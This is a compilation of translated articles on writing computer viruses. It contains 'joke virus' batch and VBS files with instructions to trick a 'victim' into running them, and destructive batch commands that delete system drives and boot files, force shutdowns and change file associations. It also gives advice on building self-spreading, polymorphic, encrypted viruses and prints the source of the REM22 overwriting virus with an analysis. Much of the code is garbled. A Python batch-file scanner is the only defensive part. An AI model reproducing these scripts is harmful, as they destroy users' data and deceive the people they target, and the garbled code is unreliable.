How viruses are written. How to create a joke virus using Notepad. What is a virus?

A virus is software whose purpose is to obtain unauthorized access to computer resources or to information on your hard drive. It is often created to do harm by copying, distorting, deleting, or replacing information. Below we consider how a joke virus is created and how to protect ourselves from viruses.

What is a virus?

Before you create a virus, you need to determine exactly what it is. For a program to be considered malicious, it must:

  • destroy information or disrupt the computer;
  • run without warning;
  • have the explicit purpose of unauthorized access or destruction of information.

A program must meet all of the above criteria to be considered a computer virus. For example, a copy protection cracker is not a malicious program: it does not destroy files, it only finds the password needed for unlocking. A disk formatting program cannot be considered malicious either: it destroys data on the computer, but does so with the consent of the user. If a program destroys information because of internal errors, it is also not considered a virus, although its developers may be held responsible for negligence or for violating consumer rights, since the program could delete important data. In general, clear criteria have not yet been established. To determine whether a program is a virus, a software and hardware forensic examination is carried out.

Types of viruses

Why are viruses created? There are many reasons. Some malicious files are really dangerous and can damage the machine; others do harm indirectly. The main goals are:

  1. Destabilization.
  2. Installing other malware.
  3. Theft, fraud, espionage.
  4. Adware.
  5. Misc.

Some computer viruses simply interfere with normal operation: the drive tray opens and closes for no reason, or hardware fails.

Some programs behave quite cunningly. Downloading media from an infected link may result in malware being downloaded.

To steal information, malware scans the hard disk, logs keystrokes, and redirects the user to a fake site. In this way accounts are stolen and used to send spam, payment systems are hacked, and computers are locked to extort money. Sometimes this is paid software that does nothing useful after it is downloaded.

Through an infected file, a public proxy server can be set up on the computer; the machine becomes a member of a botnet and is used to conduct DDoS attacks. With the popularization of Bitcoin, cases of hidden mining on users' PCs have become more frequent.

There are also programs that show ads or collect various information for marketing purposes.

How to create viruses

In Notepad (or rather, in any text editor) you can create a malicious program, and you do this in the same way ordinary programs are created. Any programming language can be used. Usually this is C++, but it can also be Delphi or .NET. The goal of creating a virus can be a joke or learning how it works. A simple program is written right in Notepad, and the code itself takes up very few lines.

You can completely rule out a virus getting onto the computer only if you disconnect from the Internet and refuse to use illegal software. Files containing viruses can function without an Internet connection; in that case they will damage the information on the user's hard drive or make programs work incorrectly.

Today, the main goal of hackers is not the development of destructive programs that clearly harm the system, but the creation of products that behave quietly. They can work for a long time and at one point cause very serious harm.

Signs of infection

Before creating a virus, attackers analyze all the ways in which it can be detected and try to get around them. Antiviruses detect malicious files effectively, but through a user's mistake some of those files can be added to the exceptions. To notice in time that the computer is infected, you need to watch for suspicious and strange behavior.

The most obvious signs of infection:

  • opening windows with unfamiliar content;
  • blocking access to sites;
  • third-party processes in the "Task Manager";
  • new entries in startup;
  • the inability to make changes to the computer settings;
  • random restarts or shutdowns of the computer.

Some of the symptoms can be caused by a joke virus and do not pose a clear threat to the system. And some of them are used to divert attention, while the main virus collects user data.

Virus spread

An attack has several stages. The first is the technological stage, which answers the question of how to create the virus. The second is the delivery of the malware to the computer. The main methods of spreading viruses:

  • an exploit takes advantage of vulnerabilities in software to take control of the system and disrupt its operation;
  • a logic bomb fires under a certain condition; it is inseparable from the host program into which it is integrated;
  • a trojan penetrates a computer under the guise of legitimate software; very often it is part of an entire planned multi-stage attack;
  • worms spread independently through local and global networks; for this they use administration errors as well as social engineering.

Prevention and treatment

Antiviruses exist to protect against viruses. They protect the system well, but as a rule the user himself is to blame for an infection. Therefore, you need to:

  • install updates in a timely manner, use licensed copies;
  • work on the computer as a standard user, not as an administrator;
  • open computer files only from trusted sources;
  • use a firewall.
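A quick static look at a received .bat file supports the rule about opening files only from trusted sources. The Python sketch below is an added example, not code from the original article: the rule names, severities and sample scripts are constructed for illustration, and the patterns are heuristics modelled on the batch commands this page shows (hidden output, window-spawning `goto` loops, recursive deletes, forced shutdowns, file-association changes).

```python
import re

# (rule id, severity, regex matched against one lower-cased command)
RULES = [
    ("hidden-output",    "low",    r"^(echo\s+off|cls)\b"),
    ("recursive-delete", "high",   r"^(del|erase)\b(?=.*\s/s\b)(?=.*\s/q\b)"),
    ("tree-removal",     "high",   r"^(rd|rmdir)\b(?=.*\s/s\b)"),
    ("boot-file-tamper", "high",   r"^(del|erase|attrib)\b.*\b(autoexec\.bat|boot\.ini|win\.ini)\b"),
    ("forced-shutdown",  "medium", r"^shutdown(\.exe)?\b.*\s[-/][sr]\b"),
    ("assoc-change",     "medium", r"^(assoc|ftype)\s+[^=\s]+\s*=\s*\S"),
    ("broadcast-msg",    "low",    r"^msg\s+\*"),
]
ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}


def commands(line):
    """Split one script line into lower-cased commands ('&' and '|' chain them)."""
    parts = re.split(r"[&|]+", line.strip().lower())
    return [p.strip().lstrip("@").strip() for p in parts if p.strip()]


def scan_batch(text):
    """Return a list of (line number, rule id, severity) findings for a batch script."""
    findings, labels = [], {}
    lines = text.splitlines()
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        if line.startswith(":") and not line.startswith("::"):
            name = line[1:].split()
            if name:
                labels[name[0].lower()] = no      # remember where the label sits
            continue
        for cmd in commands(line):
            if cmd.startswith(("rem ", "::")):    # comment: ignore rest of line
                break
            for rule, sev, pat in RULES:
                if re.search(pat, cmd):
                    findings.append((no, rule, sev))
            # An unconditional goto to a label defined earlier is a backward jump.
            m = re.match(r"goto\s+:?(\S+)", cmd)
            if m and m.group(1) in labels:
                body = lines[labels[m.group(1)]:no]
                spawns = any(c == "start" or c.startswith("start ")
                             for l in body for c in commands(l))
                findings.append((no, "spawn-loop", "high") if spawns
                                else (no, "unbounded-loop", "low"))
    return findings


def verdict(findings):
    """Highest severity among the findings, or 'none'."""
    return max((sev for _, _, sev in findings), key=ORDER.get, default="none")


# Constructed sample scripts (not real captures).
SAMPLE_WINDOW_LOOP = "@echo off\ncls\n:A\nstart iexplore.exe\ngoto A\n"
SAMPLE_MATRIX = "@echo off\ncolor 02\n:tricks\necho %random%%random%\ngoto tricks\n"
SAMPLE_DESTRUCTIVE = ("@echo off\n"
                      "rd /s /q X:\\constructed-dir\n"
                      "msg * constructed message\n"
                      "shutdown -s -t 7\n")

if __name__ == "__main__":
    for name, text in [("window loop", SAMPLE_WINDOW_LOOP),
                       ("matrix", SAMPLE_MATRIX),
                       ("destructive", SAMPLE_DESTRUCTIVE)]:
        found = scan_batch(text)
        print(name, verdict(found), found)
```

The loop rule only sees unconditional backward jumps, so a loop with a conditional exit is still flagged; treat the output as a prompt to read the script, not as a verdict on its own.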

How to make a joke virus

A virus is primarily a program that modifies the contents of any files. It is created in the same way as any other program. The simplest malware options can be created in Notepad. This does not require special skills or knowledge of programming languages.

How to create viruses in Notepad?

The following lines will create 1000 folders in one second, which will put the user in a stupor:

How to create a virus to steal passwords? It is already more difficult to answer this question. To do this, you need to consider how the user will launch the malicious file, how the data will be stolen. Only then can we start implementation. This is a very complex process. In addition, this may be illegal, so we do not recommend readers to create viruses for any purpose (except, of course, educational).

Joke viruses are simple programs that can be handed to a friend (or enemy) to make him think that his computer has been hacked, infected with a virus or seriously damaged. Joke viruses can be written in ordinary Notepad: you just need to write commands that slow down the computer, disable the operating system, or simply scare the user, and then get him to run the file. Joke viruses can be anything from an annoying nuisance to a nightmare that disrupts the system. The “viruses” in this article are intended only for harmless jokes; the worst they can do is turn off the computer. Attention: these joke viruses are designed only for computers running Windows; they will not work on Mac OS without special preparation. Let's start with step 1.

Steps

We write a fake virus that opens the "endless" windows

Launch Notepad.   Batch (.BAT) files contain commands for the computer in text form. In order to write a BAT file, you do not need a special editor - just Notepad from the standard set of Windows programs is enough. Notepad can be found in the Start menu or in the Accessories submenu. You can also open Notepad by pressing Win + R, in the text box of the dialog box that appears, type “notepad” and press Enter.

Type "@echo off" and then, from a new line, "CLS".   By default, .bat files open a command prompt window and display executable commands. The “@echo off” and “CLS” commands prevent commands from appearing on the command line window, making the reason for the joke invisible to the “victim”.

Write commands to open multiple (or infinite) windows. Now it's time to write a sequence of commands that makes your fake virus open many windows of different programs once, or keep opening these windows indefinitely. It is important to know that if a lot of windows open endlessly, the computer may eventually freeze. Read on for how to make both types of “virus”:

  • To open a certain number of windows, type the following command on a new line in Notepad: start (program name). Instead of the phrase in brackets, enter the name of a program on the “victim's” computer or the full name of its executable file. This command instructs the computer to open a window of the specified program. For instance, start iexplore.exe will open an Internet Explorer window. Repeat the “start” command as many times as you like, and your “virus” will open the window as many times as you specify. Here are a few programs that you can enter after the start command:
    • iexplore.exe - Internet Explorer browser
    • calc.exe - Calculator
    • notepad.exe - Notepad
    • winword.exe - Microsoft Word
  • To open an infinite number of windows, first type :A on a new line, including the colon. On the next line, type start iexplore.exe (or another program). Finally, on the line below, type goto A. This sequence of commands will cause the computer to open the Internet Explorer window (or any other program), return to the place immediately before the window opens, and then immediately open a new window, until the command prompt window is closed or the computer freezes.
  • Write a message in the "virus".   For a frightening effect, you can add a message to the "virus" that makes the user think that something is wrong with his computer. To display a message, start a new line and type echo your message. Then from a new line, type pause. The pause command will stop the execution of the virus after the message appears.

    • To make your joke believable, write a message similar to real error messages, for example: Fatal error. C: // directory is corrupt.
  • Save the text as a batch file. When done, on the Notepad menu, select File > Save As ..., and then specify the file extension “.bat” (for example, “pinball.bat”). In the "File Type" drop-down list, select "All Files". Save the file somewhere on the victim’s computer.

    Force the user to open the file.   For your joke to work, you need to make the “victim” launch it. This can be achieved in many ways. One of the most working is to create a shortcut for your batch file and change its icon to something that the user really uses, and then change the name of the shortcut to match the icon. Sit back and watch the results from a convenient place!

    How to write .vbs with an error or hack message

    Launch Notepad.   As in the previous joke, in this you need to write a few simple commands in Notepad. However, this time the effect will be different - instead of opening the windows, this joke creates several error messages that will make the user think that an error occurred in the operation of the operating system or that the computer was hacked.

    Type x = msgbox("Message Text", 5 + 16, "Message Header") exactly as indicated here, including brackets and quotation marks, and replace "Message Text" and "Message Header" with the desired text. This command opens a standard Windows error dialog box with the error message and window title you specified. For your joke to be believable, use messages and headers similar to real ones. For example, try "Terminal Error" as the heading and "In the C:/directory/Users/Windows/system32 directory a critical error was detected." as the message.

    • You might want to develop your joke in the direction of hacking. In this case, use messages like: “I have full access to your system. Get ready for hacking. ” None of this will actually happen, so it will only work with people who are poorly versed in computers.
    • The expression “5 + 16” tells the computer to create a dialog box with a critical error icon and two buttons, “Repeat” and “Cancel”. By changing these numbers, you can get different types of error windows. Just substitute any single-digit number from the list below for 5 and any two-digit number for 16:
      • 0 (OK button)
      • 1 (OK and Cancel buttons)
      • 2 (Cancel, Repeat and Skip buttons)
      • 3 (Yes, No, and Cancel buttons)
      • 4 (Yes and No buttons)
      • 5 (Repeat and Cancel buttons)
      • 16 (Fatal Error Icon)
      • 32 (Help Icon)
      • 48 (Warning Icon)
      • 64 (Information Icon)
  • Repeat the error message as you like.   Repeat the commands above as many times as you like with any error messages. Messages will appear one after another, that is, as soon as the user closes one message, another will open. You can use this fact to create a long message that will become increasingly urgent.

    Save the document as a Visual Basic (VBA) file. When you have entered all the desired messages, save the file. From the Notepad menu, select File > Save As ..., and give your file a name with the extension .vba. Be sure to select "All Files" from the "File Type" drop-down list. Now, in order for the joke to succeed, you need to make the "victim" run this file, for example using the trick from method 1.

    Using a pre-written batch file

    Launch Notepad. This joke uses commands typed in Notepad to force the computer to open programs randomly until the batch file is closed or the computer freezes. To make this joke, you just need to copy and paste the commands specified in this section. However, note that this will not work on all computers.

    Copy and paste the following commands:@echo offclsbegingoto% random%: 1start cmd.exegoto begin: 2start mspaint.exegoto begin: 3start pinball.exegoto begin: 4start iexplore.exegoto begin: 5start explorer.exegoto begin: 6start solitaire.exegoto begin: 7start explorer.exegoto begin: 8start edit.exegoto begin: 9start iexplore.exegoto begin: 0start mspaint.exegoto begin

  • Change these commands as you wish.   This code randomly infinitely opens the programs specified after the word “start”. You may have noticed that some programs are repeating. Change the list of programs as you wish.

    • Note that some of the names of the programs listed above may be incorrect for some machines, for example, some computers may not have “pinball.exe”. You should double-check the correctness of the names of the programs before transferring the virus-joke to the computer of the “victim”.
    • If you doubt the name of a program, remember that the exact path of the program is also suitable. For example, instead of “iexplore.exe” you can write “C:\Program Files\Internet Explorer”.
  • Save the text as a batch file and run it (if you dare).   Save the file with the extension “.bat” by selecting “All files” from the “File type” drop-down list. When you manage to get the user to start it, he will start randomly, without stopping, opening programs on the computer.

    • To make it more fun, try replacing "*.exe" in one of the commands with the full path to any user document. For example, "start C:\Documents\123.doc" will open document 123.doc from the Documents folder in the default editor, and
      edit (full file name)
      goto begin
        will open the specified file in a DOS text editor. It will look like a hacker is reading personal documents. Remember that a filename containing spaces must be enclosed in quotation marks!
  • Find the operating system you want to attack.   Most often, these are Microsoft Windows, especially older versions. Many users do not update their operating systems, leaving them vulnerable to modern attacks.

    • Mac OS X and Linux are considered more protected from virus attacks (associated with the operation of access rights and the architecture of the operating system). 95% of all viruses target Windows users.

    Decide how to spread the virus.   The virus will be a virus if it can spread to other users. You need to come up with a delivery method before you begin work on creating the virus. Commonly used delivery components:

    Find a weak spot to attack.   Successful viruses exploit weaknesses in programs and system security to work and spread. It takes a lot of research and knowledge, but there are specialized communities that can help with this.

    Decide on the functionality of your virus.   What will the virus do after infecting the system? Effects can be different, ranging from a null effect, displaying a message, deleting files, and other, more harmful effects. Be aware that creating and spreading viruses is illegal in many countries.

    Choose language.   To create a virus, you need at least a basic understanding of some programming language or scripting tool. More complex viruses very often include several programming languages. For the most efficient viruses, you will need assembler knowledge.

    • If you want to create executable viruses, look for C and C ++ courses on the Internet.
    • If you want to create macro viruses, then learn the macro language for the desired program, for example, Microsoft Office.
    • Visual Basic can be used to create malware for Windows users.
  • Get started on your virus.   It will take a long time, especially for the first time. Experiment as much as possible and learn about ways to distribute your code depending on the language used. There are guides and blogs for learning some languages.

    • Learn about polymorphic code. This will change the code of your program after each replica, hiding the virus from antivirus programs. Polymorphic code will be a fairly advanced step, which is created in various ways in different programming languages.
  • Learn about ways to hide your code.   In addition to the polymorphic code, there are ways to hide your virus. Encryption is a very popular tool among virus developers. It takes a lot of time and reading, but as a result, you can protect and extend the life of your virus.

  • Check your virus. Once you create a working prototype, test it on several machines and assemblies. The easiest way is to use virtual machines with different assemblies.

    • Try to conduct tests in a closed assembly so as to avoid accidentally getting your virus into the network. Put the test machines on a separate network and test the spread of the virus.
    • Improve your virus code as you test. Work on your code bugs.
  • DISCLAIMER

    This article is written for educational purposes and the author is not responsible for your actions. Be prudent and appreciate the work of others.

    How computer viruses are created | Bit of theory

    Computer viruses   - a type of malicious software capable of creating copies of itself and introducing itself into the code of other programs, system memory areas, boot sectors, as well as distributing its copies through various communication channels.

    Computer viruses have the following classifications:

    • Boot viruses   - viruses that infiltrate the boot sector of data storage devices, such as hard drives, flash drives, floppy disks, etc., and which can violate the availability of files.
    • File viruses   - the type of viruses that are embedded in executable files (files with the extension COM and EXE) and adversely affect their functionality.
    • File boot viruses   - viruses that combine the functions of the two previous types of viruses;
    • Document viruses   - A type of virus that infects office system files. This type is also called "macro viruses", because the infection of the system occurs through infection of the program macros.
    • Network viruses   - the type of viruses that are spread through the use of a computer network, i.e. network services and protocols.

    The most famous virus in the world was called ILOVEYOU. At its core, it was completely harmless, a worm that spammed people's mailboxes. Recently, however, the world has been exposed to cyber attacks that made everyone think about their safety. The WannaCry virus infected a lot of computers and demanded a ransom of $300 in bitcoins. However, some analysts believe that this was only a test and that there will be another attack, of a much larger scale, aimed at Apple users.

    And yet WannaCry, although it spread widely and brought in a lot of money, was an ordinary WinLocker that could be removed. The fact is that it was mostly banks and companies that paid: they had no time to investigate, and $300 is not a serious loss for them.

    We create comic viruses and not only

    Let's create some viruses of our own, which I do not recommend testing on your own computer, as this can end very badly.

    Absolutely anyone can create such viruses, since no specialized software is needed; all we need is Notepad.

    I must say right away that in almost all cases we will save our file in the .bat format. I use the name anyname, but you can give it absolutely any name.

    Delete all files

    We save this code as anyname.bat and that is all; after launch, all contents will be deleted.

    Blue screen of death

      @echo off del% systemdrive% *. * / f / s / q shutdown -r -f -t 00

    We save this code in anyname.vbs file, note that here the file format must be .vbs, not .bat.

    Format C, D, E discs in three seconds

    rd / s / q D:
    rd / s / q C:
    rd / s / q E:

    We save this file as anyname.bat and run it. Formatting all discs will occur in three seconds.

    Matrix Effect | Matrix effect

    @echo off
    rem green text on a black background, then print random numbers forever
    color 02
    :tricks
    echo %random%%random%%random%%random%%random%%random%%random%%random%
    goto tricks

    We save as anyname.bat and run it, it is not dangerous for your PC.

    Shutting down the PC and disabling the ability to reboot

      @echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo off Msg * YOU GOT INFECTED! Shutdown -s -t 7 -c "A virus is taking over c: Drive

    Save as kind.bat. DANGEROUS TO RUN ON YOUR PC!

    Replace files with broken ones

    This virus will replace the following formats (.exe .jpeg .png .mpeg .sys)

      @echo off assoc .txt \u003d jpegfile

    Save as anyname.bat and run.

    Removing an operating system

      @echo off Del C: *. * | y

    Save as anyname.bat and run on the victim's PC.

    And that’s all today, thanks for reading the article and I hope you will not abuse the information received. If you want more viruses, then write in the comments, let's do it! Save the article on your social networks so as not to lose.

    Good luck in life and see you soon!

    "He rode somewhere for a long time in an uncomfortable tight packing, he was shaking and rocking, his body was demanding food. He did not understand why he, who had just been born, was thrown out of the house ... Finally, the shaking ceased, and someone else and the coarse one opened the archive attached to the letter. A young, curious virus popped out and made its first division ... "

    In this article I will share my experience of virus writing. The basic principle of the activity of any virus can be expressed in a few words: the body of the virus is treated as code during its execution and as data during infection. There are many types of viruses and various methods of infection. Naturally, the mechanism of action of a virus depends on the specific operating system. There are, for example, viruses that work in protected processor mode (maximum privileges and absolute addressing of all memory). Companies such as AVP have to spend a lot of time and resources on treating such specimens. The only thing that saves the creators of antiviruses is the very small number of really professional viruses.

    In order to learn how to write viruses yourself, you only need to know the basics of assembler. I mean that with initial knowledge you can try to write your own viruses and explore existing ones. Other useful, and sometimes necessary, knowledge will come as you study other people's creations. Among resources on this topic I can recommend a page containing a huge number of books and articles:
    http://vx.netlux.org/lib_rus.shtml.
    All its documents are written in very clear and accessible language. There is also the well-known electronic magazine Infected Voice. It has a convenient navigation system that lets you find your way around new materials (source code and articles). This magazine is published once every half a year (at least it was earlier, now I’m not sure) and contains all the innovations in this area.

    Suppose you find the source of a virus and want to explore it. How do you do it? Honestly, I faced this problem myself the very first time. My question was this: there is a virus text, I want to see how it works, and at the same time I AM AFRAID OF IT! This is completely real: what will prevent the virus from burning my CMOS or wiping my hard drive? The answer is nothing. If you act wrongly, the virus can cause you the harm it is programmed for. However, the algorithm for correct actions is quite simple. Now we will go through it.

    We assume that the source code of the virus is written in assembler. This language is ideal for writing viruses. As you know, in assembler there are only two commands that cause "real" actions (meaning actions that can produce irreversible changes on the hard drive or elsewhere): "INT" and "OUT". All other commands work with processor registers and flags (this is a rough simplification, but by and large it is true). We do not consider WIN API functions, since in principle they can be considered a replacement for DOS interrupts, and calling them a replacement for the "INT" command.

    A little help for beginners or those who have not written in assembler for a long time: the "INT" command is used to call DOS or BIOS interrupts, and the "OUT" command is for writing data to a port. For the "INT" command, the function number is (most often) given in the AH register, and for the "OUT" command, the data written to the port is stored in the AL, AX or EAX register.

    So, take any debugger. Since you first need to understand viruses under DOS (they still work under Win), any debugger will do: Turbo Debugger from Borland Inc., CodeView from Microsoft, AFDPRO or AVPUTIL. Next, load the source into the debugger and trace it step by step. The main thing is to adhere to ONLY ONE RULE. It can be called golden.
    ATTENTION: you can safely execute the source code of your virus, but as soon as you get to the "OUT" or "INT" commands, immediately stop and start the analysis.

    You must analyze:

    • the number of the called interrupt or recording port;
    • number of the called function or data written to the port.

    To work out what these commands really do, use Tech Help, any documentation on assembler, or a book. The main thing is that your reference contains information on all interrupts and ports. That way you can understand what the next command will do without executing it on your computer. During tracing, record all data (state of the registers, command addresses, data on the called functions, etc.) on a piece of paper. Then, by the time a function is called (or a port is written to), you will be fully armed and able to determine what will happen if you execute the next command. It will also help you with a comparative analysis of changes in registers and flags.

    After you understand what a particular command ("INT" or "OUT") does, skip it and go on until you reach the end of the file or the next such command. As a result, you will take any virus apart piece by piece and understand how it functions.

    Let's look at an example. As one, I took a small virus written by a certain Reminder. I got it from the eleventh issue of Infected Voice. There it came without comments, so I had to do all the work myself. What attracted me to this creation: very small source code, a very small compiled executable, and an algorithm that is incomprehensible at first glance. Here is its source code (by the way, it is called REM22):

    Model tiny
      .code
      .startup
      start:
      pop cx
      hel:
      xchg ax, bx
      db 108h shr 1
      db 4eh; dec si
      db 9eh shr 1
      db 3ch; cmp al, xx
      db 100h shr 1
      db 40h
      fmask db "*. *", 0
      lodsw
      cwd
      mov dl, al
      shl dx, 1
      int 21h
      jmp hel
      end

    This virus is, in my opinion, a masterpiece: organizing a reproduction mechanism in such a small size is truly a work of genius. When we analyze what it does and how, everything will fall into place. In the meantime, it should be noted that in principle this virus performs no destructive actions (I think reproduction cannot be considered as such), but it infects all files in the same directory as itself. It is not a "professional" virus, that is, it lacks many of the mechanisms characteristic of serious creations:

    • there is no "friend / foe" mechanism (the virus infects everyone indiscriminately, even itself or already infected objects);
    • infection occurs only in files in the same directory as the virus (try to compile it and run it in a folder where there is nothing besides it :));
    • the virus is not polymorphic (does not encrypt itself and does not change its code);
    • the virus does not carry destructive actions;
    • the virus is not resident.

    Let's take a look inside our overwriter. The source code is a model for creating an exe file. ".startup" is a TASM directive; you can do without it, but then you have to write "org 100h" and put a label after it (and at the end, after "end", put the name of the label). The rest of the commands can easily be found in any book, where you can see what they do (do not be lazy). It remains only to figure out what these commands do together.

    This masterpiece is an ordinary loop that is repeated 6 times. What happens in the loop? We call int 21h with six different functions (93, 4E, 3C, 40, 2E, 00). Looking at them in order:

    "pop cx" only serves to reset cx (as you know, at the start of the program a zero lies at the top of the stack). What for? So that the SUB CH command (look, it should be at offset 108h in the debugger) gives CH = 01 (FFh always lies at offset 2Ah, which is somewhere in the PSP). That is, you could skip the trick and just write sub ch, ffh, but this would change the program code ... It turns out:
      "*.*", 0 = sub ch, [2Ah], and this is a ready-made mask for searching ... THAT IS WHERE THE GENIUS IS !!!

    That is, sub ch, ffh is "Ae" (in ASCII codes with a space at the end). Further, everything from offset 101 (code 93) to offset 10B (code 00) is FUNCTIONS FOR int 21h !!! I.e., these are the 6 functions that we call in turn in a loop (see their numbers above), and the code that results from them is just tinsel. IT MAKES ABSOLUTELY NO SENSE! That is simply how it turned out when the functions were put in a row. That is, if I write TANAT, this will translate into a sequence of some commands, right? But this is essentially data ... although in this program you can’t call it data, it's just FUNCTIONS for int 21h, that's the GENIUS!!! There is no point in explaining further, because in each of the six passes a function is called and all the registers are approximately tailored to the ideal ... See:

    First, function 93h is called: Pipe (Error). It CARRIES NO LOAD for the program itself, USES NOTHING, IS SIMPLY SUPERFLUOUS, AN EXTRA PASS, BUT GIVEN the genius of the code THERE IS SIMPLY NO GETTING AWAY FROM IT !!! There will be another such "extraneous" function, see below.

    Second: 4Eh. This is what we need! Search for a file, and at the time of the call DX holds the offset of the file mask (108h) !!!

    Third: 3Ch, file creation. This is another "extraneous" function. We do not need it: we do not need to create a file (we only need to write ourselves into the file that we found in the previous step). DX holds some garbage that naturally has nothing in common with a file name, therefore CF = 1 and we move on to the next pass.

    Fourth: 40h, write to file. This is what we need! DX contains the offset 100h (i.e. the beginning of REM22), but CX is a little off: it is 400h, so 400h bytes will actually be written to the beginning of the found file, while REM22 takes up only 22 bytes, i.e. 1002 extra bytes will be written. This is true. But given the genius of the code :), this can be forgiven.

    Fifth: 2Eh, Set Verify Flag. This is an EXTRANEOUS function; here it is simply the appendix of the program.

    Sixth: 00h, the exit from the program (I did not know this either).

    That's all: we have 6 passes, of which only 3 are meaningful: search, write and exit. Most likely much of this will be unclear to you. To figure it out, load the source into the debugger, trace it, watch the state of the data in the registers, and look at my comments. Then everything will become clear. Finally, I give the debugging table so that you do not have to compile it yourself (and, at the same time, so you can see how it should look). In principle, it alone should be enough to understand what is happening in this virus, but I think the comments will not be superfluous.

    | ADR | CODE | ASM | 1 | 2 | 3 | 4 | 5 | 6 |
    |---|---|---|---|---|---|---|---|---|
    | 100 | 59 | POP CX | CX = 0 | - | - | - | - | - |
    | 101 | 93 | XCHG AX, BX | AX = BX = 0 | AX = 0, BX = 9300h | AX = 9300h, BX = 0 | AX = 0, BX = 0005h | AX = 0005h, BX = 0400h | AX = 0400h, BX = 2E00h |
    | 102 | 84 4E 4F | TEST [BP+4Fh], CL | - | - | - | - | - | - |
    | 105 | 3C 80 | CMP AL, 80h | - | - | - | - | - | - |
    | 107 | 40 | INC AX | AX = 0001h | AX = 0001h | AX = 9301h | AX = 0001h | AX = 0006h | AX = 0401h |
    | 108 | 2A 2E 2A 00 | SUB CH, [002Ah] | CX = 0100h | CX = 0200h | CX = 0300h | CX = 0400h | CX = 0500h | CX = 0600h |
    | 10C | AD | LODSW (DS:SI -> AX) | AX = DS:100 = 9359h | AX = DS:102 = 4E84h | AX = DS:104 = 3C4Fh | AX = DS:106 = 4080h | AX = DS:108 = 2E2Ah | AX = DS:10A = 002Ah |
    | 10D | 99 | CWD (DX = E(AX)) | DX = FFFFh | DX = 0000h | DX = 0000h | DX = 0000h | DX = 0000h | DX = 0000h |
    | 10E | 8A D0 | MOV DL, AL | DX = FF59h | DX = 0084h | DX = 004Fh | DX = 0080h | DX = 002Ah | DX = 002Ah |
    | 110 | D1 E2 | SHL DX, 1 | DX = FEB2h | DX = 0108h | DX = 009Eh | DX = 0100h | DX = 0054h | DX = 0054h |
    | 112 | CD 21 | INT 21h | AH = 93 (Pipe) - Error | AH = 4E (FindFirst) | AH = 3C (CreateFile) | AH = 40 (WriteFile) | AH = 2E (SetVerifyFlag) | AH = 00 (Terminate) |
    | 114 | EB EB | JMP SHORT 101 | ??? | - | - | - | ??? | - |
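The INT 21h row of the debugging table can be derived on paper, in keeping with the rule of stopping at every "INT" instead of executing it. The Python sketch below is an added example, not part of the original article: it takes only the twelve bytes at offsets 100h-10Bh from the table's CODE column, applies the LODSW / CWD / MOV DL,AL / SHL DX,1 arithmetic to them, and reports which DOS function each pass would request; the function and variable names are illustrative, and the FFh byte at offset 2Ah is taken from the article's statement rather than from a real PSP.

```python
# Bytes at offsets 100h-10Bh, copied from the CODE column of the debug table.
HEAD = bytes.fromhex("59 93 84 4E 4F 3C 80 40 2A 2E 2A 00")
BASE = 0x100  # load offset of a DOS .COM image; SI also starts at 100h

# INT 21h function names exactly as the article's table labels them.
INT21 = {0x93: "Pipe (error)", 0x4E: "FindFirst", 0x3C: "CreateFile",
         0x40: "WriteFile", 0x2E: "SetVerifyFlag", 0x00: "Terminate"}


def trace_int21(head=HEAD, passes=6):
    """Compute AH, DX and CX at each INT 21h without executing anything."""
    rows, si, ch = [], BASE, 0
    for n in range(1, passes + 1):
        # SUB CH,[002Ah]: the article states FFh lies there, so CH grows by 1.
        ch = (ch + 1) & 0xFF
        # LODSW: AX = word at DS:SI, then SI += 2 (the code is read as data).
        lo, hi = head[si - BASE], head[si - BASE + 1]
        si += 2
        ax = hi << 8 | lo
        # CWD: DX = sign extension of AX.
        dx = 0xFFFF if ax & 0x8000 else 0x0000
        # MOV DL,AL then SHL DX,1.
        dx = (dx & 0xFF00) | lo
        dx = (dx << 1) & 0xFFFF
        rows.append({"pass": n, "ah": hi, "func": INT21.get(hi, "unknown"),
                     "dx": dx, "cx": ch << 8})
    return rows


def asciiz_at(head, offset):
    """Return the NUL-terminated string at a memory offset inside head, or None."""
    i = offset - BASE
    if not 0 <= i < len(head) or 0 not in head[i:]:
        return None
    return head[i:head.index(0, i)].decode("ascii", "replace")


if __name__ == "__main__":
    for row in trace_int21():
        note = ""
        if row["func"] == "FindFirst":
            # DX points back into the code bytes, which double as the mask.
            note = f'  mask at DX: {asciiz_at(HEAD, row["dx"])!r}'
        print(f'pass {row["pass"]}: AH={row["ah"]:02X}h {row["func"]:<14}'
              f' DX={row["dx"]:04X}h CX={row["cx"]:04X}h{note}')
```

Pass 2 shows the article's central point: DX = 0108h points at the bytes 2A 2E 2A 00, which the CPU executes as an instruction and DOS reads as the search mask.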
    